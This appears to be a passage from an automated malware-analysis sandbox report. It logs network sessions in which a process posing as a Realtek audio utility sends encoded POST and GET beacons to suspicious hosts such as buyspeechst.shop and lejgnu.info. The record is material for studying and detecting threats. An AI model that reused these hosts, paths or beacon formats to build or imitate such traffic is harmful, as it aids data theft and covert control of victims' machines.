64 38 30 73 79 6e 72 61 52 65 2f 49 67 47 64 6b 67 75 57 4c 38 38 71 57 62 70 31 56 4a 70 62 6d 43 43 75 6c 58 6d 6f 6e 48 68 41 63 49 51 53 30 74 32 42 4a 4f 77 6a 56 74 43 50 72 6b 4d 35 64 4a 36 37 4a 2f 2f 74 77 30 39 58 63 72 54 7a 2b 75 34 47 2f 36 63 6e 46 68 43 36 33 38 6c 6d 70 77 77 3d 3d Data Ascii: AuPF3v=ZdYnZ6+WLY4YYrRmYREfYjU4K03n/9vbfCj5qIjKlOF1bzuUtg9BzzFk0IzHkkOENMp/17KXOB5ieR5QRC2Junu7nLo7Pgf8d80synraRe/IgGdkguWL88qWbp1VJpbmCCulXmonHhAcIQS0t2BJOwjVtCPrkM5dJ67J//tw09XcrTz+u4G/6cnFhC638lmpww==
Jan 13, 2025 10:24:25.243267059 CET	1057	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:24:25 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UiwR030xAQaoTw%2F9kKGb0M92qobgKG28cBVlKU9mVvdHa2KvWawnbqu2sqUNVKlsmR1biJnxBh08Pd6a10UFMHwdRa63e8Tyy7KtSBagOMwB3ZFHBaeCb46NRlql94tbUiqmpSWnDg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014554889cf05fd-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100200&min_rtt=100200&rtt_var=50100&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_+
Jan 13, 2025 10:24:25.243288040 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.11.20	49816	104.21.112.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:27.621593952 CET	831	OUT	POST /w98i/ HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.buyspeechst.shop Referer: http://www.buyspeechst.shop/w98i/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 64 31 43 54 65 55 75 6c 4a 42 32 7a 46 6b 6e 49 7a 43 67 6b 4f 54 4e 4d 6b 4b 31 2b 69 58 4f 42 39 69 65 51 4a 51 52 31 61 47 6f 6e 75 35 2f 37 6f 35 4c 67 66 38 64 38 30 73 79 6e 2f 30 52 65 6e 49 68 32 74 6b 69 4c 71 45 6e 63 71 5a 52 4a 31 56 44 4a 62 69 43 43 75 58 58 6b 63 42 48 69 34 63 49 55 43 30 73 6e 42 57 45 77 6a 54 67 69 4f 2b 33 4d 55 57 51 71 66 32 2f 66 34 73 31 4d 66 41 6a 6c 2b 6b 7a 4b 79 62 35 50 37 33 6c 79 44 66 2b 6e 6e 79 74 2b 76 34 57 36 32 32 52 4e 4a 4b 6e 52 33 4a 6c 52 30 57 46 31 73 3d Data Ascii: AuPF3v=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4d1CTeUulJB2zFknIzCgkOTNMkK1+iXOB9ieQJQR1aGonu5/7o5Lgf8d80syn/0RenIh2tkiLqEncqZRJ1VDJbiCCuXXkcBHi4cIUC0snBWEwjTgiO+3MUWQqf2/f4s1MfAjl+kzKyb5P73lyDf+nnyt+v4W622RNJKnR3JlR0WF1s=
Jan 13, 2025 10:24:27.870425940 CET	1052	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:24:27 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I99fz95jWiJV7Eu0xHIPXp99bc%2FkeniO5LlCbbfKhh4VtfQEGnvmDlO6cDnWMNMqKRZK3i%2FPN1TT%2BwuVGQeeajuEK9xzUXM5ZUgGWRBUQfGYodXG2fD1ChDAP4GMF%2BbqhYfbXV45rg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90145558eaa1c981-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100223&min_rtt=100223&rtt_var=50111&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff 0d 0a Data Ascii: d8Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_
Jan 13, 2025 10:24:27.870462894 CET	16	IN	Data Raw: 62 0d 0a e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: b+
Jan 13, 2025 10:24:27.870487928 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.11.20	49817	104.21.112.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:30.245429993 CET	1289	OUT	POST /w98i/ HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.buyspeechst.shop Referer: http://www.buyspeechst.shop/w98i/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 5a 64 59 6e 5a 36 2b 57 4c 59 34 59 59 4b 68 6d 61 77 45 66 4e 54 55 35 47 55 33 6e 6c 4e 76 66 66 43 66 35 71 4a 33 61 6d 34 56 31 65 77 57 55 73 43 56 42 31 7a 46 6b 38 6f 7a 44 67 6b 50 52 4e 4d 73 52 31 2b 6e 69 4f 44 31 69 4d 6a 52 51 41 52 4f 47 37 48 75 35 6a 4c 6f 38 50 67 66 70 64 36 55 6f 79 6e 76 30 52 65 6e 49 68 30 46 6b 6c 65 57 45 6c 63 71 57 62 70 31 4a 4a 70 61 39 43 47 4b 74 58 6b 49 52 41 54 59 63 4a 30 53 30 75 52 31 57 48 51 6a 52 6c 69 50 39 33 4d 59 5a 51 71 54 63 2f 66 4e 37 31 4e 58 41 6e 44 72 50 69 34 2b 35 73 4f 4c 4a 36 32 54 43 31 6c 2f 43 71 63 66 62 66 4d 32 48 5a 63 39 4e 73 6a 4c 6e 67 7a 67 4b 45 6c 63 61 4a 2f 63 6d 6e 4b 6d 6c 61 7a 48 58 66 58 4f 45 55 45 44 76 6f 62 4c 51 75 45 2b 61 38 2f 59 36 36 4e 69 76 71 65 63 37 52 53 7a 64 33 78 6d 75 7a 6e 47 48 78 56 64 77 31 54 45 41 4e 74 71 4f 36 76 62 58 4b 38 72 64 58 53 72 52 51 4c 78 52 78 7a 51 48 2b 7a 32 72 6b 4e 6e 51 53 42 71 6f 51 68 36 65 51 43 2b 42 43 36 33 76 32 67 78 72 68 55 47 [TRUNCATED] Data Ascii: AuPF3v=ZdYnZ6+WLY4YYKhmawEfNTU5GU3nlNvffCf5qJ3am4V1ewWUsCVB1zFk8ozDgkPRNMsR1+niOD1iMjRQAROG7Hu5jLo8Pgfpd6Uoynv0RenIh0FkleWElcqWbp1JJpa9CGKtXkIRATYcJ0S0uR1WHQjRliP93MYZQqTc/fN71NXAnDrPi4+5sOLJ62TC1l/CqcfbfM2HZc9NsjLngzgKElcaJ/cmnKmlazHXfXOEUEDvobLQuE+a8/Y66Nivqec7RSzd3xmuznGHxVdw1TEANtqO6vbXK8rdXSrRQLxRxzQH+z2rkNnQSBqoQh6eQC+BC63v2gxrhUG89mO33vCZGbDm22twbE0JwLM14pTTNS/E+rSLCPkSHZ35AsArdJlVOvJuZzqVBrQAfmuWlYOdWYCIRsKuqE8v1tat35UTBYrWf8MNgX5MlgnPG3PX7MFRHr7LBbVcuFDAJCGylAdHnhlCoJ6Ou8crU2PZihIzU4eFyUEx5EAVSQ5dalFrLO2oxRDJvaF3a5oBdF+e5Mq3SaHT2g9wYcyQArCSkOS+s5qygRJghOlZjR3n+WSgBr0hsrQIyq/Ua1i4lntQoqJDyUKoHWU9wCzoR2NXKSPnV3XK/eFxVpPN90Hp9hyxbW4ncdUtFAuS3qlB+RQMz1bys8gVfazOHZNzj
Jan 13, 2025 10:24:30.245477915 CET	1289	OUT	Data Raw: 66 77 47 53 32 67 65 5a 52 71 70 67 6d 6e 54 76 77 4b 39 45 6c 36 4b 78 4f 4f 69 5a 2b 31 33 65 61 72 44 4e 75 43 43 39 49 7a 6b 79 78 71 75 41 33 59 6e 68 41 73 35 31 6f 66 4a 75 33 63 77 53 34 47 34 4e 45 71 6d 6e 38 6f 33 77 77 51 49 6b 51 53 Data Ascii: fwGS2geZRqpgmnTvwK9El6KxOOiZ+13earDNuCC9IzkyxquA3YnhAs51ofJu3cwS4G4NEqmn8o3wwQIkQSahTcSspb6jow4kZ8LZqKtYDTKpx6wKlsV/wM3PkHGgb41gl5mkHJDShfvN/JMi4iuOAPE/4zEQt/x2ZuOr7lP/3geRoUSv+RVWA/gKjc3pStnif+vn+7jAhZKq3qCaStkmF09+LD0grMEPrj3gKij3BQKqLDAhHmS
Jan 13, 2025 10:24:30.245529890 CET	5402	OUT	Data Raw: 4d 53 58 57 37 6f 79 54 78 39 6b 63 75 69 53 4e 63 6f 41 64 35 2b 50 5a 4e 78 7a 30 34 33 62 71 74 36 66 66 53 77 34 43 54 4e 48 4d 62 7a 45 59 4d 6b 41 49 65 2b 6e 36 49 43 68 48 63 54 4f 79 6f 2f 64 69 56 37 77 6f 34 6a 4c 6f 31 43 45 63 30 6a Data Ascii: MSXW7oyTx9kcuiSNcoAd5+PZNxz043bqt6ffSw4CTNHMbzEYMkAIe+n6IChHcTOyo/diV7wo4jLo1CEc0jtyL1VnZZgz4CewQNWk7BftKEPOdedaGmAk6iQ22Vk4fEzsxzmCyqV/Dh84c/RSPZrFh/xC2bcejqtoDATXPyWAQmejm0/4DISD9PctIC/Fuf3krdmo/4mKV7XTxXyH36NOmC5fMTh4xxKR9gH6Ytq0JBI4A1hwWA9
Jan 13, 2025 10:24:30.543497086 CET	1070	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:24:30 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FYzPujui%2BprnyflZHMifabHj%2F2vpLvrx7Q4vJNtaAvIhSaLpZpH6b8rNkalH%2FYW7S4ZUWfUK0zEyzvFxI%2BNmwMccFImV8RmCaGG%2FGZh43Kt64j00vI343o4s%2BxlI%2FiPz564nk%2FQQag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901455695a08c997-IAD Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=99819&min_rtt=99819&rtt_var=49909&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7980&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 6e c2 30 10 44 ef fe 8a 2d 77 b2 01 71 e8 61 65 a9 25 41 45 0a 34 6a cd 81 a3 c1 5b 19 89 c6 c6 de 34 e2 ef ab 04 55 ea 75 e6 cd 68 86 9e aa f7 b5 39 b6 35 bc 99 5d 03 ed e1 b5 d9 ae 61 36 47 dc d6 66 83 58 99 ea e1 2c 8b 12 b1 de cf b4 22 2f df 57 4d 9e ad d3 8a e4 22 57 d6 ab 72 05 fb 20 b0 09 7d e7 08 1f a2 22 9c 20 3a 05 77 1f 73 0b fd 8f f1 0b ad 28 6a e3 19 12 df 7a ce c2 0e 0e 1f 0d 0c 36 43 17 04 be 46 0e 42 07 e2 2f 19 32 a7 1f 4e 05 61 1c 9b 92 56 64 9d 4b 9c b3 7e 89 f6 ec 19 3e 27 00 ac c0 30 0c c5 a9 bf e7 c8 7c f6 59 8a ec 43 84 36 24 81 e7 92 f0 2f a6 08 a7 5d 84 d3 9f 5f 00 00 00 ff ff e3 02 00 2b bb 83 fa 0a 01 00 00 0d 0a Data Ascii: e3Ln0D-wqae%AE4j[4Uuh95]a6GfX,"/WM"Wr }" :ws(jz6CFB/2NaVdK~>'0\|YC6$/]_+
Jan 13, 2025 10:24:30.543545961 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.11.20	49818	104.21.112.1	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:32.869308949 CET	534	OUT	GET /w98i/?v1GdZ=vUN3&AuPF3v=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE= HTTP/1.1 Host: www.buyspeechst.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:24:33.101625919 CET	806	IN	HTTP/1.1 404 Not Found Date: Mon, 13 Jan 2025 09:24:33 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2FJR4NEX%2BBDVwSp79bAva6A4yhlb%2F7kr3JXhU5P3v49M5r%2F8nMisdDrApsYWnM97VkUonDAlO0QxMDMPyW87Td53Kf6cKXTUrrCIecd8C2idODNazY1xmYr0dqIjkPTWDCyRJCa80w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90145579bd1ec997-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=100333&min_rtt=100333&rtt_var=50166&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=534&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 13, 2025 10:24:33.101658106 CET	273	IN	Data Raw: 31 30 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f Data Ascii: 10a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.buyspeechst.shop Port
Jan 13, 2025 10:24:33.101682901 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.11.20	49819	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:38.546413898 CET	796	OUT	POST /gcvb/ HTTP/1.1 Host: www.lejgnu.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.lejgnu.info Referer: http://www.lejgnu.info/gcvb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 63 31 68 32 58 53 44 4d 72 37 77 67 52 6e 70 6b 4d 35 5a 31 6c 38 49 41 6d 35 53 41 74 58 47 5a 43 4a 45 66 4b 65 70 61 33 56 4d 39 73 4b 31 44 75 50 6e 33 75 4f 71 6a 49 36 6e 41 63 71 36 5a 76 36 44 4e 41 48 6a 4d 69 61 4e 36 79 35 36 35 4c 62 75 41 2b 43 73 78 75 71 42 75 70 43 44 42 43 75 65 33 78 5a 4f 58 61 61 66 6c 65 69 54 44 51 53 2f 30 73 44 74 48 62 70 6e 32 79 31 6f 59 45 66 67 36 47 68 33 62 69 56 6c 6e 67 51 72 50 42 6b 7a 4e 58 51 6a 78 58 64 63 58 50 78 62 74 71 46 4d 44 69 30 4e 6d 6f 46 62 59 35 32 66 66 78 30 78 38 48 56 56 70 79 66 36 2f 74 52 50 74 76 51 3d 3d Data Ascii: AuPF3v=c1h2XSDMr7wgRnpkM5Z1l8IAm5SAtXGZCJEfKepa3VM9sK1DuPn3uOqjI6nAcq6Zv6DNAHjMiaN6y565LbuA+CsxuqBupCDBCue3xZOXaafleiTDQS/0sDtHbpn2y1oYEfg6Gh3biVlngQrPBkzNXQjxXdcXPxbtqFMDi0NmoFbY52ffx0x8HVVpyf6/tRPtvQ==
Jan 13, 2025 10:24:39.568928003 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:24:39 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.11.20	49820	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:41.392493010 CET	816	OUT	POST /gcvb/ HTTP/1.1 Host: www.lejgnu.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.lejgnu.info Referer: http://www.lejgnu.info/gcvb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 63 31 68 32 58 53 44 4d 72 37 77 67 51 45 78 6b 4b 5a 6c 31 69 63 49 44 73 5a 53 41 69 33 47 64 43 4f 4d 66 4b 61 77 58 33 47 34 39 76 76 52 44 74 4c 4c 33 70 4f 71 6a 63 71 6e 4a 53 4b 36 51 76 36 65 77 41 43 4c 4d 69 61 5a 36 79 37 53 35 4b 71 75 66 2b 53 73 4a 77 4b 42 37 74 43 44 42 43 75 65 33 78 5a 4b 74 61 61 58 6c 5a 54 6a 44 52 32 54 33 6b 6a 74 45 63 70 6e 32 67 46 6f 55 45 66 67 39 47 6a 43 4d 69 58 74 6e 67 51 37 50 50 57 62 4f 63 51 6a 33 50 39 64 54 47 42 36 70 68 6b 4d 78 78 55 42 76 6d 48 58 67 34 67 53 46 73 47 46 59 45 47 4a 62 32 76 44 58 76 54 4f 32 79 59 68 6a 70 63 49 46 49 39 2f 4c 4c 65 31 38 48 33 6e 61 77 31 63 3d Data Ascii: AuPF3v=c1h2XSDMr7wgQExkKZl1icIDsZSAi3GdCOMfKawX3G49vvRDtLL3pOqjcqnJSK6Qv6ewACLMiaZ6y7S5Kquf+SsJwKB7tCDBCue3xZKtaaXlZTjDR2T3kjtEcpn2gFoUEfg9GjCMiXtngQ7PPWbOcQj3P9dTGB6phkMxxUBvmHXg4gSFsGFYEGJb2vDXvTO2yYhjpcIFI9/LLe18H3naw1c=
Jan 13, 2025 10:24:42.413182020 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 13 Jan 2025 09:24:42 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.11.20	49821	47.83.1.90	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:24:44.234111071 CET	2578	OUT	POST /gcvb/ HTTP/1.1 Host: www.lejgnu.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.lejgnu.info Referer: http://www.lejgnu.info/gcvb/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 63 31 68 32 58 53 44 4d 72 37 77 67 51 45 78 6b 4b 5a 6c 31 69 63 49 44 73 5a 53 41 69 33 47 64 43 4f 4d 66 4b 61 77 58 33 48 41 39 76 5a 64 44 74 71 4c 33 6f 4f 71 6a 41 61 6e 45 53 4b 37 43 76 36 47 38 41 43 50 63 69 5a 68 36 39 34 71 35 4e 59 57 66 30 53 73 4a 34 71 41 63 70 43 43 44 43 75 75 7a 78 59 36 74 61 61 58 6c 5a 51 37 44 59 43 2f 33 70 44 74 48 62 70 6d 35 79 31 6f 34 45 66 6f 79 47 6a 57 63 2b 32 4e 6e 67 77 4c 50 4e 6a 76 4f 65 77 6a 31 61 39 64 31 47 42 32 6d 68 6b 51 4c 78 55 6b 30 6d 41 4c 67 35 55 37 30 30 46 39 4f 65 48 39 32 2b 66 50 33 67 79 79 6b 38 49 74 66 68 73 59 36 49 72 72 74 50 63 35 75 63 79 37 39 76 7a 31 46 72 67 4b 38 4e 71 2f 74 70 4a 71 46 6c 4f 38 4a 61 6c 55 35 51 54 56 44 6b 4d 58 4e 78 4c 68 50 53 6a 36 32 71 5a 66 45 4d 49 73 6d 62 65 65 38 32 2b 65 66 63 34 53 37 43 4d 6f 73 50 51 55 71 61 73 65 73 48 45 7a 5a 52 32 36 30 6b 39 35 69 6e 61 63 42 71 49 36 55 4a 53 36 44 2f 50 6a 6b 46 31 41 4f 45 4b 39 6f 65 4f 76 38 37 62 39 33 45 63 39 [TRUNCATED] Data Ascii: AuPF3v=c1h2XSDMr7wgQExkKZl1icIDsZSAi3GdCOMfKawX3HA9vZdDtqL3oOqjAanESK7Cv6G8ACPciZh694q5NYWf0SsJ4qAcpCCDCuuzxY6taaXlZQ7DYC/3pDtHbpm5y1o4EfoyGjWc+2NngwLPNjvOewj1a9d1GB2mhkQLxUk0mALg5U700F9OeH92+fP3gyyk8ItfhsY6IrrtPc5ucy79vz1FrgK8Nq/tpJqFlO8JalU5QTVDkMXNxLhPSj62qZfEMIsmbee82+efc4S7CMosPQUqasesHEzZR260k95inacBqI6UJS6D/PjkF1AOEK9oeOv87b93Ec9YNYZzA/CH/cTs1ZTjJNsj1u8xyRRPjFUP8CGBWwIIkPtKDziGGu840aVkfBLoh2laWv4iUqjCv1X4Ql0HyvOZAE18AvRAPyzWSFrEabIqOFM0m+Rl+l9RAj73SCrM2v5gd6mhmDAYT0A5qOVCVgENkqiBM0WBzzlPKochQRcUAoaUH5XqaFaFW9FmYy+tMvmCjusUvri+P6hx7y+JnAVn7eJY5M8M72DZXXNcblih7HrfGAg6XCuSHPRF3qdg3uLlpPV5RmDGvQi0v2Sz1YWugAloe/QJIMa6hZ3sHGAJFrA3ZiMTTKCT4/UJuJXU5V9B0JPTT8el7ll3n6LjbdjddvY0tTIK/iTfvhmD9r1Vxz4wUG7wcdRtJCN8hop5srl+wq818q4hQlwKycsawuGHRdmKu2glSiODVF3XDrl2QFYKEm7sG292LAxa4RjBWyJMDEEAh1mVxmKx6r/0lamSl/DkEwp6ptj6691eMwj6eF0f7ixZ3FWEnuvFK2uZuhq8BOY9Q/1Ug285OKuReQUzy9S2oOAGZ/2GU3IFxjzKdZ2sZtHznHj5Dzlmykxe+GhLdHYEZwN/FmtBEfL+JwpOB2/2C+NmbB8XGqbkmqe4wmGnI93Gd1bTQvwv4uNc5vzhJDxf1JjdP1QvuMPhhCUeTsiton3KRkIyL [TRUNCATED]
Jan 13, 2025 10:24:44.234185934 CET	5387	OUT	Data Raw: 74 66 4b 64 4c 30 49 35 70 78 63 65 69 62 77 55 49 70 76 30 49 4d 6d 4d 4e 2f 36 55 45 36 56 4d 2f 47 30 2b 51 39 70 55 57 44 2b 49 64 7a 46 69 46 54 67 66 4e 33 46 6f 43 55 2f 63 72 37 63 59 66 77 32 58 64 6f 32 32 63 57 6d 65 6f 74 34 43 46 47 Data Ascii: tfKdL0I5pxceibwUIpv0IMmMN/6UE6VM/G0+Q9pUWD+IdzFiFTgfN3FoCU/cr7cYfw2Xdo22cWmeot4CFG0zzKqGhpM9A2dvyUW5dQCaHmuziD58RtFTk0ZUQxxR+KXqQ5AY7BGLfnBOCe4p/NOWoCvNJD5L5w8pV16Lc8x6uLXAfVOll0N7ys3o0i6mMjBViQaNO0RB0UX7o/vVnOm0Ehl1WNF0EKAIkv9ZJxnOjddXZ5/l9wC
